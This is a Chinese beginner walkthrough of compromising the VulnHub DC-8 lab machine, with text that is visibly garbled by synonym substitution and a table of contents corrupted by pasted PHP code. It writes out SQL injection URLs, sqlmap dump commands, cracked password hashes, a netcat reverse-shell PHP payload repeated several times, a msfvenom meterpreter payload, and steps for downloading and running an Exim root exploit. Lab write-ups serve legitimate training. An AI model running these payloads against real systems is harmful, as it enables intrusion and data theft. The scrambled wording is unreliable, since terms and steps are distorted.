靶机DC-8（详细渗透，适合新手渗透）

给朕跪下知道不

靶机DC-8 （具体浸透，合适新脚浸透）
- 0x01靶机形貌
- 0x02情况拆建
- 0x03靶机浸透
- - 1、疑息搜集
 - 2、缺点开掘
 - 3、缺点操纵
 - 4、提权
 - - - 1.find 命令查找具有sudo权限的命令，发明exim4正在操纵时具有root权限`
 - 2.检察命令exim4命令版本
 - 3.操纵serachsploit查找exim命令的缺点
 - 4.举办检察用法，发明有两个操纵办法
 - 5.将文件复造到/tmp目录，并用python翻开一个暂时的HTTP效劳
 - 6.将46996.sh下载到靶机
 - 7.然后我们再从头举办上传
 - [url=https://blog.csdn.net/#8flag
 <?php
 system("nc -e /bin/bash 192.168.30.182 4567");
 ?>_309]8.检察flag
 <?php
 system("nc -e /bin/bash 192.168.30.182 4567");
 ?>[/url]
- 0x04尝试总结

靶机DC-8 （具体浸透，合适新脚浸透）

0x01靶机形貌

靶机疑息
链接https://www.vulnhub.com/entry/dc-8,367/公布日期2019年9月4日做者DCAU易度俭朴0x02情况拆建

1. 下载并导进靶机

翻开vmware-文件-翻开-DC-8.ova

2. 检察收集适配器

将靶机收集适配器改成NAT形式

3. 启动靶机

面击 ▶靶机，开启成功

0x03靶机浸透

1、疑息搜集

1. 主机发明

2. 端心扫描

3. 具体扫描

4. 目录扫描

5. gobuster目录扫描

为了避免漏扫，gobuster再举办目录扫描

6. 网站指纹辨认

2、缺点开掘

脚工sql注进

1. 经由过程脚工考证，此处url露有sql注进缺点

http://192.168.30.206/?nid=2 and 1=1 --+

http://192.168.30.206/?nid=2 and 1=2 --+

2. 断定字段数

http://192.168.30.206/?nid=2 order by 1 --+

http://192.168.30.206/?nid=2 order by 2 --+

所以能够看出字段数为1
3. 断定显现地位

http://192.168.30.206/?nid=-2 union select 1 --+

4. 检察当前数据库

5. 查找库d7db中局部的表

http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+

6. 查找uesrs表中局部的列

http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+

7. 查询表中的数据

http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+

http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+

sqlmap主动化施行

1. 查当前数据库

sqlmap -u 'http://192.168.30.206/?nid=2' -current-db

复造代码

2. 查表

sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db --tables

复造代码

3. 查列

sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users --columns

复造代码

4. 查数据

sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users -C login,name,pass --dump

复造代码

查询到两组数据

admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

复造代码

4. 操纵John举办暴力破解

破解出john的暗码trutle
5. 能够将破解出去的暗码尝试ssh长途登录

发明ssh长途登录失利，发明需求操纵公公钥登录

6. 正在此网页尝试登录，该网页由前面貌次扫描获得

http://192.168.30.206/user

复造代码

登录成功

长途代码施行缺点

1.找到能够编纂php代码的处所

2.尝试写phpinfo代码

发明保留并提交后并出有任何显现。根据网上的道法，php代码保留后会施行代码，那该当是正在靶机上曾经施行了代码，只是正在背景没有会显现出去。
3、缺点操纵

办法一：

1. 编写反弹shell剧本

我们尝试施行PHP反弹shell剧本，将原本的flag
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
举办保留，避免报错

flag
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>

复造代码

2.保留提交前开启kali举办监听

3. 面击提交发明网页此时正跳转，而我们的进犯机曾经拿到shell

办法两：

1. 操纵msfvenom建造反弹shell剧本

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999
R >php_shell.txt

复造代码

2.将php代码复造到网站中

3. kali设置msf选项，举办监听

4.提交代码（此时背景默许施行所编写的php剧本代码）

5. 拿到shell，并用python翻开一个尺度shell

python -c 'import pty;pty.spawn("/bin/bash")'

复造代码

4、提权

1.find 命令查找具有sudo权限的命令，发明exim4正在操纵时具有root权限`

find / -perm -u=s -type f 2>/dev/null

复造代码

2.检察命令exim4命令版本

Exim version 4.89

3.操纵serachsploit查找exim命令的缺点

4.举办检察用法，发明有两个操纵办法

5.将文件复造到/tmp目录，并用python翻开一个暂时的HTTP效劳

6.将46996.sh下载到靶机

wget http://192.168.30.182/46996.sh

复造代码

举办赋权

施行，可是发明两种办法均发作毛病

缘故原由：那个报错是因为windows系统下编纂然后上传到linux系统施行招致的
打点计划：当地编纂检察文件规范：set ff=unix

7.然后我们再从头举办上传

操纵第两个提权命令举办提权成功

./46996.sh -m netcat

复造代码

8.检察flag
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>

0x04尝试总结

那个靶机考查了目录扫描，sql注进，长途代码施行，反弹shell，提权时操纵find查找能够施行的命令，对命令exim的版本提权缺点等，是一个没有错的靶机，合适新脚去浸透

免责声明：假如进犯了您的权益，请联络站少，我们会实时删除侵权内乱容，感谢协作！